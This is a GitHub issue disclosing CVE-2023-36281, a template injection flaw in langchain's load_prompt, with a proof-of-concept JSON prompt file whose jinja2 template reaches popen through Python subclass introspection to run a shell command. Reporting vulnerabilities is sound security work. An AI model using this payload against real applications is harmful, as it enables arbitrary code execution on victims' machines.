Headline
CVE-2023-36281: Template injection to arbitrary code execution · Issue #4394 · langchain-ai/langchain
An issue in langchain v.0.0.171 allows a remote attacker to execute arbitrary code via the via the a json file to the load_prompt parameter.
System Info
windows 11
Who can help?
No response
Information
- The official example notebooks/scripts
- My own modified scripts
Related Components
- LLMs/Chat Models
- Embedding Models
- Prompts / Prompt Templates / Prompt Selectors
- Output Parsers
- Document Loaders
- Vector Stores / Retrievers
- Memory
- Agents / Agent Executors
- Tools / Toolkits
- Chains
- Callbacks/Tracing
- Async
Reproduction
- save the following data to pt.json
{ "input_variables": [ “prompt” ], "output_parser": null, "partial_variables": {}, "template": "Tell me a {{ prompt }} {{ '’.__class__.__bases__[0].__subclasses__()[147].__init__.__globals__[‘popen’](‘dir’).read() }}", "template_format": "jinja2", "validate_template": true, "_type": “prompt” }
- run
from langchain.prompts import load_prompt loaded_prompt = load_prompt(“pt.json”) loaded_prompt.format(history="", prompt="What is 1 + 1?")
- the dir command will be execute
attack scene: Alice can send prompt file to Bob and let Bob to load it.
analysis: Jinja2 is used to concat prompts. Template injection will happened
note: in the pt.json, the template has payload, the index of subclasses maybe different in other environment.
Expected behavior
code should not be execute
Related news
An issue in langchain v.0.0.171 allows a remote attacker to execute arbitrary code via the via the a json file to the load_prompt parameter.